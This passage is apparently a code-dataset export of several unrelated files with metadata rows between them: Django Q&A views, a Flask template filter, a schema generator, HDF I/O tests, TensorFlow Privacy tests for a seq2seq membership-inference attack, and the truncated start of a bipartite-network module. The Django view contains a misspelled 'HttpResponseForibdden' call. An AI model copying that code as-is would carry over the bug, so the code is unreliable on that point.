return HttpResponseRedirect(reverse(edit_profile))
@login_required
def post_question(request, entity_slug, slug=None):
entity = Entity.objects.get(slug=entity_slug)
if slug:
q = get_object_or_404(Question, unislug=slug, entity=entity)
if request.method == "POST":
form = QuestionForm(request.POST)
if form.is_valid():
if slug:
if q.author != request.user:
return HttpResponseForibdden(_("You can only edit your own questions."))
if q.answers.count():
return HttpResponseForbidden(_("Question has been answered, editing disabled."))
question = q
question.subject = form.cleaned_data.get('subject', "")
question.save()
else:
question = form.save(commit=False)
question.author = request.user
question.entity = entity
question.save()
form.save_m2m()
return HttpResponseRedirect(question.get_absolute_url())
else:
if slug:
subject = q.subject
else:
subject = ""
form = QuestionForm(initial={'entity': entity, 'subject': subject})
context = RequestContext(request, {"form": form,
"entity": entity,
"max_length_q_subject": MAX_LENGTH_Q_SUBJECT,
"slug": slug,
})
return render(request, "qa/post_question.html", context)
@login_required
def upvote_question(request, q_id):
if request.method == "POST":
q = get_object_or_404(Question, id=q_id)
user = request.user
if q.author == user or user.upvotes.filter(question=q):
return HttpResponseForbidden(_("You already upvoted this question"))
else:
upvote = QuestionUpvote.objects.create(question=q, user=user)
#TODO: use signals so the next line won't be necesary
new_count = increase_rating(q)
return HttpResponse(new_count)
else:
return HttpResponseForbidden(_("Use POST to upvote a question"))
@transaction.commit_on_success
def increase_rating(q):
q = Question.objects.get(id=q.id)
q.rating += 1
q.save()
return q.rating
class RssQuestionFeed(Feed):
"""Simple feed to get all questions"""
title = _('OK QA Question Feed')
link = "/"
description = _('Questions from OKQA')
def items(self):
return Question.objects.order_by('-updated_at')
def item_title(self, item):
return item.subject
def item_description(self, item):
return item.content
class AtomQuestionFeed(RssQuestionFeed):
feed_type = Atom1Feed
subtitle = RssQuestionFeed.description
class RssQuestionAnswerFeed(Feed):
""""Give question, get all answers for that question"""
def get_object(self, request, q_id):
return get_object_or_404(Question, pk=q_id)
def title(self, obj):
return _('Answers for the question') + ' "%s' % obj.subject + '"'
def link(self, obj):
return obj.get_absolute_url()
def description(self, obj):
return _('A feed of all answers for the question') + ' "%s' % obj.subject + '"'
def items(self, obj):
return Answer.objects.filter(question=obj).order_by('-updated_at')
class AtomQuestionAnswerFeed(RssQuestionAnswerFeed):
feed_type = Atom1Feed
subtitle = RssQuestionAnswerFeed.description
@require_POST
def flag_question(request, q_id):
q = get_object_or_404(Question, id=q_id)
user = request.user
ret = {}
if user.is_anonymous():
messages.error(request, _('Sorry, you have to login to flag questions'))
ret["redirect"] = '%s?next=%s' % (settings.LOGIN_URL, q.get_absolute_url())
elif (user.profile.is_editor and user.profile.locality == q.entity) or (user == q.author and not q.answers.all()):
q.delete()
messages.info(request, _('Question has been removed'))
ret["redirect"] = reverse('qna', args=(q.entity.slug,))
elif user.flags.filter(question=q):
ret["message"] = _('Thanks. You already reported this question')
else:
flag = QuestionFlag.objects.create(question=q, reporter=user)
#TODO: use signals so the next line won't be necesary
q.flagged()
ret["message"] = _('Thank you for falgging the question. One of our editors will look at it shortly.')
return HttpResponse(json.dumps(ret), content_type="application/json")
| bsd-3-clause | 4,962,761,711,069,016,000 | 34.276364 | 118 | 0.633749 | false | 4.032003 | false | false | false |
ondrae/1900 | filters.py | 1 | 1543 | from datetime import datetime
import jinja2
import flask
blueprint = flask.Blueprint('filters', __name__)
# http://flask.pocoo.org/snippets/33/
# and
# http://stackoverflow.com/questions/12288454/how-to-import-custom-jinja2-filters-from-another-file-and-using-flask
@jinja2.contextfilter
@blueprint.app_template_filter("timesince")
def friendly_time(context, dt, past_="ago",
future_="from now",
default="just now"):
"""
Returns string representing "time since"
or "time until" e.g.
3 days ago, 5 hours from now etc.
"""
now = datetime.utcnow()
try:
trimmed_time = dt[:19]
dt = datetime.strptime(trimmed_time, "%Y-%m-%d %H:%M:%S")
except:
pass
try:
# Thu, 26 Feb 2015 03:45:21 GMT
dt = datetime.strptime(dt, "%a, %d %b %Y %H:%M:%S %Z")
except:
pass
if now > dt:
diff = now - dt
dt_is_past = True
else:
diff = dt - now
dt_is_past = False
periods = (
(diff.days / 365, "year", "years"),
(diff.days / 30, "month", "months"),
(diff.days / 7, "week", "weeks"),
(diff.days, "day", "days"),
(diff.seconds / 3600, "hour", "hours"),
(diff.seconds / 60, "minute", "minutes"),
(diff.seconds, "second", "seconds"),
)
for period, singular, plural in periods:
if period:
return "%d %s %s" % (period, \
singular if period == 1 else plural, \
past_ if dt_is_past else future_)
return default | mit | 6,174,330,437,350,917,000 | 26.087719 | 115 | 0.558004 | false | 3.428889 | false | false | false |
sbmlteam/deviser | generator/util/generateRNG.py | 1 | 3682 | #!/usr/bin/env python
#
# @file generateRNG.py
# @brief function for generating RNG schema
# @author Frank Bergmann
# @author Sarah Keating
#
# <!--------------------------------------------------------------------------
#
# Copyright (c) 2013-2018 by the California Institute of Technology
# (California, USA), the European Bioinformatics Institute (EMBL-EBI, UK)
# and the University of Heidelberg (Germany), with support from the National
# Institutes of Health (USA) under grant R01GM070923. All rights reserved.
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.
#
# Neither the name of the California Institute of Technology (Caltech), nor
# of the European Bioinformatics Institute (EMBL-EBI), nor of the University
# of Heidelberg, nor the names of any contributors, may be used to endorse
# or promote products derived from this software without specific prior
# written permission.
# ------------------------------------------------------------------------ -->
"""Function for generating RNG schema"""
import sys
from ..parseXML import ParseXML
from ..util import global_variables as gv
from ..validation import RNGSchemaFiles
def generate_rng_for(filename): # , overwrite=True):
"""
Parse XML file and then invokes RNG file generation code.
:param filename: the XML file to parse
:return: returns nothing.
"""
gv.running_tests = False
parser = ParseXML.ParseXML(filename)
ob = dict()
if gv.code_returned == gv.return_codes['success']:
# catch a problem in the parsing
try:
ob = parser.parse_deviser_xml()
except Exception:
gv.code_returned = gv.return_codes['parsing error']
if gv.code_returned == gv.return_codes['success']:
# try:
if gv.is_package:
generate_rng(ob)
# except Exception :
# gv.code_returned = gv.return_codes['unknown error - please report']
def generate_rng(ob):
"""
Wrapper function. Creates RNG Schema file.
:param ob: the big dictionary object produced by XML file parsing.
:return: returns nothing.
"""
ex = RNGSchemaFiles.RNGSchemaFiles(ob)
ex.write_file()
def main(args):
"""
Checks correct number of arguments and then invokes RNG code.
"""
if len(args) != 2:
gv.code_returned = gv.return_codes['missing function argument']
print('Usage: generateRNG.py xmlfile')
else:
generate_rng_for(args[1])
if gv.code_returned == gv.return_codes['success']:
print('code successfully written')
else:
print('writing rng failed')
return gv.code_returned
if __name__ == '__main__':
main(sys.argv)
| lgpl-2.1 | -3,363,840,852,102,879,700 | 35.098039 | 78 | 0.67409 | false | 3.971953 | false | false | false |
bionet/ted.python | tests/test_signal_io.py | 1 | 1292 | #!/usr/bin/env python
"""
Test classes for writing and reading signals to and from HDF files.
"""
import unittest
import os
import numpy as np
import bionet.utils.signal_io as s
filename = 'test_signal_io_data.h5'
block_size = 10000
class SignalIOTestCase(unittest.TestCase):
def setUp(self):
'''Generate and save test data.'''
N = 1000000
self.u = np.random.rand(N)
w = s.WriteArray(filename)
w.write(self.u)
w.close()
def tearDown(self):
'''Clean up test file.'''
os.remove(filename)
def testReadOneBlock(self):
'''Test one-block read of saved data.'''
r = s.ReadArray(filename)
u_read = r.read()
r.close()
assert all(self.u==u_read),'read block does not match original block'
def testReadManyBlocks(self):
'''Test multi-block read of saved data.'''
r = s.ReadArray(filename)
temp = []
while True:
data_block = r.read(block_size)
if not len(data_block):
break
temp += data_block.tolist()
u_read = np.array(temp)
r.close()
assert all(self.u==u_read),'read block does not match original block'
if __name__ == "__main__":
unittest.main()
| bsd-3-clause | -5,436,309,697,830,017,000 | 22.071429 | 77 | 0.573529 | false | 3.734104 | true | false | false |
tensorflow/privacy | tensorflow_privacy/privacy/privacy_tests/membership_inference_attack/seq2seq_mia_test.py | 1 | 16296 | # Copyright 2020, The TensorFlow Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Lint as: python3
"""Tests for tensorflow_privacy.privacy.privacy_tests.membership_inference_attack.seq2seq_mia."""
from absl.testing import absltest
import numpy as np
from tensorflow_privacy.privacy.privacy_tests.membership_inference_attack.data_structures import AttackType
from tensorflow_privacy.privacy.privacy_tests.membership_inference_attack.data_structures import PrivacyReportMetadata
from tensorflow_privacy.privacy.privacy_tests.membership_inference_attack.seq2seq_mia import create_seq2seq_attacker_data
from tensorflow_privacy.privacy.privacy_tests.membership_inference_attack.seq2seq_mia import run_seq2seq_attack
from tensorflow_privacy.privacy.privacy_tests.membership_inference_attack.seq2seq_mia import Seq2SeqAttackInputData
class Seq2SeqAttackInputDataTest(absltest.TestCase):
def test_validator(self):
valid_logits_train = iter([np.array([]), np.array([])])
valid_logits_test = iter([np.array([]), np.array([])])
valid_labels_train = iter([np.array([]), np.array([])])
valid_labels_test = iter([np.array([]), np.array([])])
invalid_logits_train = []
invalid_logits_test = []
invalid_labels_train = []
invalid_labels_test = []
self.assertRaises(
ValueError,
Seq2SeqAttackInputData(logits_train=valid_logits_train).validate)
self.assertRaises(
ValueError,
Seq2SeqAttackInputData(labels_train=valid_labels_train).validate)
self.assertRaises(
ValueError,
Seq2SeqAttackInputData(logits_test=valid_logits_test).validate)
self.assertRaises(
ValueError,
Seq2SeqAttackInputData(labels_test=valid_labels_test).validate)
self.assertRaises(ValueError, Seq2SeqAttackInputData(vocab_size=0).validate)
self.assertRaises(ValueError, Seq2SeqAttackInputData(train_size=0).validate)
self.assertRaises(ValueError, Seq2SeqAttackInputData(test_size=0).validate)
self.assertRaises(ValueError, Seq2SeqAttackInputData().validate)
# Tests that both logits and labels must be set.
self.assertRaises(
ValueError,
Seq2SeqAttackInputData(
logits_train=valid_logits_train,
logits_test=valid_logits_test,
vocab_size=0,
train_size=0,
test_size=0).validate)
self.assertRaises(
ValueError,
Seq2SeqAttackInputData(
labels_train=valid_labels_train,
labels_test=valid_labels_test,
vocab_size=0,
train_size=0,
test_size=0).validate)
# Tests that vocab, train, test sizes must all be set.
self.assertRaises(
ValueError,
Seq2SeqAttackInputData(
logits_train=valid_logits_train,
logits_test=valid_logits_test,
labels_train=valid_labels_train,
labels_test=valid_labels_test).validate)
self.assertRaises(
ValueError,
Seq2SeqAttackInputData(
logits_train=invalid_logits_train,
logits_test=invalid_logits_test,
labels_train=invalid_labels_train,
labels_test=invalid_labels_test,
vocab_size=0,
train_size=0,
test_size=0).validate)
class Seq2SeqTrainedAttackerTest(absltest.TestCase):
def test_create_seq2seq_attacker_data_logits_and_labels(self):
attack_input = Seq2SeqAttackInputData(
logits_train=iter([
np.array([
np.array([[0.1, 0.1, 0.8], [0.7, 0.3, 0]], dtype=np.float32),
np.array([[0.4, 0.5, 0.1]], dtype=np.float32)
],
dtype=object),
np.array(
[np.array([[0.25, 0.6, 0.15], [1, 0, 0]], dtype=np.float32)],
dtype=object),
np.array([
np.array([[0.9, 0, 0.1], [0.25, 0.5, 0.25]], dtype=np.float32),
np.array([[0, 1, 0], [0.2, 0.1, 0.7]], dtype=np.float32)
],
dtype=object)
]),
logits_test=iter([
np.array([
np.array([[0.25, 0.4, 0.35], [0.2, 0.4, 0.4]], dtype=np.float32)
],
dtype=object),
np.array([
np.array([[0.3, 0.3, 0.4], [0.4, 0.4, 0.2]], dtype=np.float32),
np.array([[0.3, 0.35, 0.35]], dtype=np.float32)
],
dtype=object)
]),
labels_train=iter([
np.array([
np.array([2, 0], dtype=np.float32),
np.array([1], dtype=np.float32)
],
dtype=object),
np.array([np.array([1, 0], dtype=np.float32)], dtype=object),
np.array([
np.array([0, 1], dtype=np.float32),
np.array([1, 2], dtype=np.float32)
],
dtype=object)
]),
labels_test=iter([
np.array([np.array([2, 1], dtype=np.float32)]),
np.array([
np.array([2, 0], dtype=np.float32),
np.array([1], dtype=np.float32)
],
dtype=object)
]),
vocab_size=3,
train_size=3,
test_size=2)
privacy_report_metadata = PrivacyReportMetadata()
attacker_data = create_seq2seq_attacker_data(
attack_input_data=attack_input,
test_fraction=0.25,
balance=False,
privacy_report_metadata=privacy_report_metadata)
self.assertLen(attacker_data.features_train, 3)
self.assertLen(attacker_data.features_test, 2)
for _, feature in enumerate(attacker_data.features_train):
self.assertLen(feature, 1) # each feature has one average rank
# Tests that fields of PrivacyReportMetadata are populated.
self.assertIsNotNone(privacy_report_metadata.loss_train)
self.assertIsNotNone(privacy_report_metadata.loss_test)
self.assertIsNotNone(privacy_report_metadata.accuracy_train)
self.assertIsNotNone(privacy_report_metadata.accuracy_test)
def test_balanced_create_seq2seq_attacker_data_logits_and_labels(self):
attack_input = Seq2SeqAttackInputData(
logits_train=iter([
np.array([
np.array([[0.1, 0.1, 0.8], [0.7, 0.3, 0]], dtype=np.float32),
np.array([[0.4, 0.5, 0.1]], dtype=np.float32)
],
dtype=object),
np.array(
[np.array([[0.25, 0.6, 0.15], [1, 0, 0]], dtype=np.float32)],
dtype=object),
np.array([
np.array([[0.9, 0, 0.1], [0.25, 0.5, 0.25]], dtype=np.float32),
np.array([[0, 1, 0], [0.2, 0.1, 0.7]], dtype=np.float32)
],
dtype=object)
]),
logits_test=iter([
np.array([
np.array([[0.25, 0.4, 0.35], [0.2, 0.4, 0.4]], dtype=np.float32)
],
dtype=object),
np.array([
np.array([[0.3, 0.3, 0.4], [0.4, 0.4, 0.2]], dtype=np.float32),
np.array([[0.3, 0.35, 0.35]], dtype=np.float32)
],
dtype=object),
np.array([
np.array([[0.25, 0.4, 0.35], [0.2, 0.4, 0.4]], dtype=np.float32)
],
dtype=object)
]),
labels_train=iter([
np.array([
np.array([2, 0], dtype=np.float32),
np.array([1], dtype=np.float32)
],
dtype=object),
np.array([np.array([1, 0], dtype=np.float32)], dtype=object),
np.array([
np.array([0, 1], dtype=np.float32),
np.array([1, 2], dtype=np.float32)
],
dtype=object)
]),
labels_test=iter([
np.array([np.array([2, 1], dtype=np.float32)]),
np.array([
np.array([2, 0], dtype=np.float32),
np.array([1], dtype=np.float32)
],
dtype=object),
np.array([np.array([2, 1], dtype=np.float32)])
]),
vocab_size=3,
train_size=3,
test_size=3)
privacy_report_metadata = PrivacyReportMetadata()
attacker_data = create_seq2seq_attacker_data(
attack_input_data=attack_input,
test_fraction=0.33,
balance=True,
privacy_report_metadata=privacy_report_metadata)
self.assertLen(attacker_data.features_train, 4)
self.assertLen(attacker_data.features_test, 2)
for _, feature in enumerate(attacker_data.features_train):
self.assertLen(feature, 1) # each feature has one average rank
# Tests that fields of PrivacyReportMetadata are populated.
self.assertIsNotNone(privacy_report_metadata.loss_train)
self.assertIsNotNone(privacy_report_metadata.loss_test)
self.assertIsNotNone(privacy_report_metadata.accuracy_train)
self.assertIsNotNone(privacy_report_metadata.accuracy_test)
def _get_batch_logits_and_labels(num_sequences, max_tokens_in_sequence,
vocab_size):
num_tokens_in_sequence = np.random.choice(max_tokens_in_sequence,
num_sequences) + 1
batch_logits, batch_labels = [], []
for num_tokens in num_tokens_in_sequence:
logits, labels = _get_sequence_logits_and_labels(num_tokens, vocab_size)
batch_logits.append(logits)
batch_labels.append(labels)
return np.array(
batch_logits, dtype=object), np.array(
batch_labels, dtype=object)
def _get_sequence_logits_and_labels(num_tokens, vocab_size):
sequence_logits = []
for _ in range(num_tokens):
token_logits = np.random.random(vocab_size)
token_logits /= token_logits.sum()
sequence_logits.append(token_logits)
sequence_labels = np.random.choice(vocab_size, num_tokens)
return np.array(
sequence_logits, dtype=np.float32), np.array(
sequence_labels, dtype=np.float32)
def get_seq2seq_test_input(n_train,
n_test,
max_seq_in_batch,
max_tokens_in_sequence,
vocab_size,
seed=None):
"""Returns example inputs for attacks on seq2seq models."""
if seed is not None:
np.random.seed(seed=seed)
logits_train, labels_train = [], []
for _ in range(n_train):
num_sequences = np.random.choice(max_seq_in_batch, 1)[0] + 1
batch_logits, batch_labels = _get_batch_logits_and_labels(
num_sequences, max_tokens_in_sequence, vocab_size)
logits_train.append(batch_logits)
labels_train.append(batch_labels)
logits_test, labels_test = [], []
for _ in range(n_test):
num_sequences = np.random.choice(max_seq_in_batch, 1)[0] + 1
batch_logits, batch_labels = _get_batch_logits_and_labels(
num_sequences, max_tokens_in_sequence, vocab_size)
logits_test.append(batch_logits)
labels_test.append(batch_labels)
return Seq2SeqAttackInputData(
logits_train=iter(logits_train),
logits_test=iter(logits_test),
labels_train=iter(labels_train),
labels_test=iter(labels_test),
vocab_size=vocab_size,
train_size=n_train,
test_size=n_test)
class RunSeq2SeqAttackTest(absltest.TestCase):
def test_run_seq2seq_attack_size(self):
result = run_seq2seq_attack(
get_seq2seq_test_input(
n_train=10,
n_test=5,
max_seq_in_batch=3,
max_tokens_in_sequence=5,
vocab_size=2))
self.assertLen(result.single_attack_results, 1)
def test_run_seq2seq_attack_trained_sets_attack_type(self):
result = run_seq2seq_attack(
get_seq2seq_test_input(
n_train=10,
n_test=5,
max_seq_in_batch=3,
max_tokens_in_sequence=5,
vocab_size=2))
seq2seq_result = list(result.single_attack_results)[0]
self.assertEqual(seq2seq_result.attack_type, AttackType.LOGISTIC_REGRESSION)
def test_run_seq2seq_attack_calculates_correct_auc(self):
result = run_seq2seq_attack(
get_seq2seq_test_input(
n_train=20,
n_test=10,
max_seq_in_batch=3,
max_tokens_in_sequence=5,
vocab_size=3,
seed=12345),
balance_attacker_training=False)
seq2seq_result = list(result.single_attack_results)[0]
np.testing.assert_almost_equal(
seq2seq_result.roc_curve.get_auc(), 0.63, decimal=2)
def test_run_seq2seq_attack_calculates_correct_metadata(self):
attack_input = Seq2SeqAttackInputData(
logits_train=iter([
np.array([
np.array([[0.1, 0.1, 0.8], [0.7, 0.3, 0]], dtype=np.float32),
np.array([[0.4, 0.5, 0.1]], dtype=np.float32)
],
dtype=object),
np.array(
[np.array([[0.25, 0.6, 0.15], [1, 0, 0]], dtype=np.float32)],
dtype=object),
np.array([
np.array([[0.9, 0, 0.1], [0.25, 0.5, 0.25]], dtype=np.float32),
np.array([[0, 1, 0], [0.2, 0.1, 0.7]], dtype=np.float32)
],
dtype=object),
np.array([
np.array([[0.9, 0, 0.1], [0.25, 0.5, 0.25]], dtype=np.float32),
np.array([[0, 1, 0], [0.2, 0.1, 0.7]], dtype=np.float32)
],
dtype=object)
]),
logits_test=iter([
np.array([
np.array([[0.25, 0.4, 0.35], [0.2, 0.4, 0.4]], dtype=np.float32)
],
dtype=object),
np.array([
np.array([[0.3, 0.3, 0.4], [0.4, 0.4, 0.2]], dtype=np.float32),
np.array([[0.3, 0.35, 0.35]], dtype=np.float32)
],
dtype=object),
np.array([
np.array([[0.25, 0.4, 0.35], [0.2, 0.4, 0.4]], dtype=np.float32)
],
dtype=object),
np.array([
np.array([[0.25, 0.4, 0.35], [0.2, 0.4, 0.4]], dtype=np.float32)
],
dtype=object)
]),
labels_train=iter([
np.array([
np.array([2, 0], dtype=np.float32),
np.array([1], dtype=np.float32)
],
dtype=object),
np.array([np.array([1, 0], dtype=np.float32)], dtype=object),
np.array([
np.array([0, 1], dtype=np.float32),
np.array([1, 2], dtype=np.float32)
],
dtype=object),
np.array([
np.array([0, 0], dtype=np.float32),
np.array([0, 1], dtype=np.float32)
],
dtype=object)
]),
labels_test=iter([
np.array([np.array([2, 1], dtype=np.float32)]),
np.array([
np.array([2, 0], dtype=np.float32),
np.array([1], dtype=np.float32)
],
dtype=object),
np.array([np.array([2, 1], dtype=np.float32)]),
np.array([np.array([2, 1], dtype=np.float32)]),
]),
vocab_size=3,
train_size=4,
test_size=4)
result = run_seq2seq_attack(attack_input, balance_attacker_training=False)
metadata = result.privacy_report_metadata
np.testing.assert_almost_equal(metadata.loss_train, 0.91, decimal=2)
np.testing.assert_almost_equal(metadata.loss_test, 1.58, decimal=2)
np.testing.assert_almost_equal(metadata.accuracy_train, 0.77, decimal=2)
np.testing.assert_almost_equal(metadata.accuracy_test, 0.67, decimal=2)
if __name__ == '__main__':
absltest.main()
| apache-2.0 | 8,734,620,172,058,187,000 | 37.343529 | 121 | 0.560506 | false | 3.476851 | true | false | false |
tsakim/bicm | src/bicm.py | 1 | 41931 | # -*- coding: utf-8 -*-
"""
Created on Tue Dec 1 08:04:28 2015
Module:
bicm - Bipartite Configuration Model
Author:
Mika Straka
Description:
Implementation of the Bipartite Configuration Model (BiCM) for binary
undirected bipartite networks [Saracco2015]_.
Given the biadjacency matrix of a bipartite graph in the form of a binary
array as input, the module allows the user to calculate the biadjacency
matrix of the ensemble average graph :math:`<G>^*` of the BiCM null model.
The matrix entries correspond to the link probabilities :math:`<G>^*_{rc} =
p_{rc}` between nodes of the two distinct bipartite node sets.
Subsequently, one can calculate the p-values of the node similarities for
nodes in the same bipartite layer [Saracco2017]_.
Usage:
Be ``mat`` a two-dimensional binary NumPy array. The nodes of the two
bipartite layers are ordered along the rows and columns, respectively. In
the algorithm, the two layers are identified by the boolean values ``True``
for the **row-nodes** and ``False`` for the **column-nodes**.
Import the module and initialize the Bipartite Configuration Model::
>>> from src.bicm import BiCM
>>> cm = BiCM(bin_mat=mat)
To create the biadjacency matrix of the BiCM, use::
>>> cm.make_bicm()
.. note::
Note that ``make_bicm`` outputs a *status message* in the console, which
informs the user whether the underlying numerical solver has converged
to a solution.
The function is based on the ``scipy.optimize.root`` routine of the
`SciPy package <http://scipy.org>`_ to solve a log-likelihood
maximization problem and uses thus the same arguments (except for
*fun* and *args*, which are specified in our problem).
This means that the user has full control over the selection of a
solver, the initial conditions, tolerance, etc.
As a matter of fact, it may happen that the default function call
``make_bicm()`` results in an unsuccessful solver, which requires
adjusting the function arguments.
In this case, please refer the description of the functions
:func:`BiCM.make_bicm` and :func:`BiCM.solve_equations`, and the
`scipy.optimize.root documentation
<https://docs.scipy.org/doc/scipy-0.19.0/reference/generated/
scipy.optimize.root.html>`_.
The biadjacency matrix of the BiCM null model can be saved in *<filename>*::
    >>> cm.save_biadjacency(filename=<filename>, delim='\\t')
By default, the file is saved in a human-readable ``.csv`` format with tab
delimiters, which can be changed using the keyword ``delim``. The
information can also be saved as a binary NumPy file ``.npy`` by using::
>>> cm.save_biadjacency(filename=<filename>, binary=True)
If the file is not binary, it should end with ``.csv``. If it is binary
instead, NumPy automatically attaches the ending ``.npy``.
In order to analyze the similarity of the **row-nodes** and to save
the p-values of the corresponding :math:`\\Lambda`-motifs (i.e. of the
number of shared neighbors [Saracco2017]_), use::
>>> cm.lambda_motifs(True, filename=<filename>)
For the **column-nodes**, use::
>>> cm.lambda_motifs(False, filename=<filename>)
By default, the resulting p-values are saved as binary NumPy file to reduce
the required disk space, and the format suffix ``.npy`` is appended. If the
file should be saved in a human-readable ``.csv`` format, use::
>>> cm.lambda_motifs(True, filename=<filename>, delim='\\t', \
binary=False)
or analogously::
>>> cm.lambda_motifs(False, filename=<filename>, delim='\\t', \
binary=False)
.. note::
The p-values are saved as a one-dimensional array with index
:math:`k \\in \\left[0, \\ldots, \\binom{N}{2} - 1\\right]` for a
bipartite layer of :math:`N` nodes. The indices ``(i, j)`` of the
nodes corresponding to entry ``k`` in the array can be reconstructed
        using the method :func:`BiCM.flat2triumat_idx`. The number of nodes
        ``N`` can be recovered from the length of the array with
        :func:`BiCM.flat2triumat_dim`.
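        For illustration, if ``pvals`` is such an array and ``k`` one of its
        indices (both names are hypothetical placeholders)::
            >>> N = BiCM.flat2triumat_dim(len(pvals))
            >>> i, j = BiCM.flat2triumat_idx(k, N)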
Subsequently, the p-values can be used to perform a multiple hypotheses
testing of the node similarities and to obtain statistically validated
monopartite projections [Saracco2017]_. The p-values are calculated in
parallel by default, see :ref:`parallel` for details.
.. note::
Since the calculation of the p-values is computationally demanding, the
``bicm`` module uses the Python `multiprocessing
<https://docs.python.org/2/library/multiprocessing.html>`_ package by
default for this purpose. The number of parallel processes depends on
the number of CPUs of the work station (see variable ``num_procs`` in
the method :func:`BiCM.get_pvalues_q`).
If the calculation should **not** be performed in parallel, use::
>>> cm.lambda_motifs(<bool>, parallel=False)
instead of::
>>> cm.lambda_motifs(<bool>)
References:
.. [Saracco2015] `F. Saracco, R. Di Clemente, A. Gabrielli, T. Squartini,
Randomizing bipartite networks: the case of the World Trade Web,
Scientific Reports 5, 10595 (2015)
<http://www.nature.com/articles/srep10595>`_
.. [Saracco2017] `F. Saracco, M. J. Straka, R. Di Clemente, A. Gabrielli,
G. Caldarelli, and T. Squartini,
Inferring monopartite projections of bipartite networks: an entropy-based
approach, New J. Phys. 19, 053022 (2017)
<http://stacks.iop.org/1367-2630/19/i=5/a=053022>`_
"""
import ctypes
import multiprocessing
import scipy.optimize as opt
import numpy as np
from poibin.poibin import PoiBin
class BiCM(object):
"""Bipartite Configuration Model for undirected binary bipartite networks.
This class implements the Bipartite Configuration Model (BiCM), which can
be used as a null model for the analysis of undirected and binary bipartite
networks. The class provides methods for calculating the biadjacency matrix
of the null model and for quantifying node similarities in terms of
p-values.
"""
def __init__(self, bin_mat):
"""Initialize the parameters of the BiCM.
:param bin_mat: binary input matrix describing the biadjacency matrix
of a bipartite graph with the nodes of one layer along the rows
and the nodes of the other layer along the columns.
:type bin_mat: numpy.array
"""
self.bin_mat = np.array(bin_mat, dtype=np.int64)
self.check_input_matrix_is_binary()
[self.num_rows, self.num_columns] = self.bin_mat.shape
self.dseq = self.set_degree_seq()
self.dim = self.dseq.size
self.sol = None # solution of the equation system
self.adj_matrix = None # biadjacency matrix of the null model
self.input_queue = None # queue for parallel processing
self.output_queue = None # queue for parallel processing
def check_input_matrix_is_binary(self):
"""Check that the input matrix is binary, i.e. entries are 0 or 1.
:raise AssertionError: raise an error if the input matrix is not
binary
"""
assert np.all(np.logical_or(self.bin_mat == 0, self.bin_mat == 1)), \
"Input matrix is not binary."
def set_degree_seq(self):
"""Return the node degree sequence of the input matrix.
:returns: node degree sequence [degrees row-nodes, degrees column-nodes]
:rtype: numpy.array
:raise AssertionError: raise an error if the length of the returned
degree sequence does not correspond to the total number of nodes
"""
dseq = np.empty(self.num_rows + self.num_columns)
dseq[self.num_rows:] = np.squeeze(np.sum(self.bin_mat, axis=0))
dseq[:self.num_rows] = np.squeeze(np.sum(self.bin_mat, axis=1))
assert dseq.size == (self.num_rows + self.num_columns)
return dseq
def make_bicm(self, x0=None, method='hybr', jac=None, tol=None,
callback=None, options=None):
"""Create the biadjacency matrix of the BiCM null model.
Solve the log-likelihood maximization problem to obtain the BiCM
null model which respects constraints on the degree sequence of the
input matrix.
The problem is solved using ``scipy``'s root function with the solver
defined by ``method``. The status of the solver after running
    ``scipy.root`` and the difference between the network and BiCM degrees
are printed in the console.
The default solver is the modified Powell method ``hybr``. Least-squares
can be chosen with ``method='lm'`` for the Levenberg-Marquardt approach.
Depending on the solver, keyword arguments ``kwargs`` can be passed to
the solver. Please refer to the `scipy.optimize.root documentation
<https://docs.scipy.org/doc/scipy-0.19.0/reference/generated/
scipy.optimize.root.html>`_ for detailed descriptions.
.. note::
It can happen that the solver ``method`` used by ``scipy.root``
does not converge to a solution.
In this case, please try another ``method`` or different initial
conditions and refer to the `scipy.optimize.root documentation
<https://docs.scipy.org/doc/scipy-0.19.0/reference/generated/
scipy.optimize.root.html>`_.
:param x0: initial guesses for the solutions. The first entries are the
initial guesses for the row-nodes, followed by the initial guesses
for the column-nodes.
:type x0: 1d numpy.array, optional
:param method: type of solver, default is ‘hybr’. For other
solvers, see the `scipy.optimize.root documentation
<https://docs.scipy.org/doc/
scipy-0.19.0/reference/generated/scipy.optimize.root.html>`_.
:type method: str, optional
:param jac: Jacobian of the system
:type jac: bool or callable, optional
:param tol: tolerance for termination. For detailed control, use
solver-specific options.
:type tol: float, optional
:param callback: optional callback function to be called at
every iteration as ``callback(self.equations, x)``,
see ``scipy.root`` documentation
:type callback: function, optional
:param options: a dictionary of solver options, e.g. ``xtol`` or
``maxiter``, see scipy.root documentation
:type options: dict, optional
:param kwargs: solver-specific options, please refer to the SciPy
documentation
:raise ValueError: raise an error if not enough initial conditions
are provided
"""
self.sol = self.solve_equations(x0=x0, method=method, jac=jac, tol=tol,
callback=callback, options=options)
# create BiCM biadjacency matrix:
self.adj_matrix = self.get_biadjacency_matrix(self.sol.x)
# self.print_max_degree_differences()
# assert self.test_average_degrees(eps=1e-2)
# ------------------------------------------------------------------------------
# Solve coupled nonlinear equations and get BiCM biadjacency matrix
# ------------------------------------------------------------------------------
def solve_equations(self, x0=None, method='hybr', jac=None, tol=None,
callback=None, options=None):
"""Solve the system of equations of the maximum log-likelihood problem.
The system of equations is solved using ``scipy``'s root function with
the solver defined by ``method``. The solutions correspond to the
Lagrange multipliers
.. math::
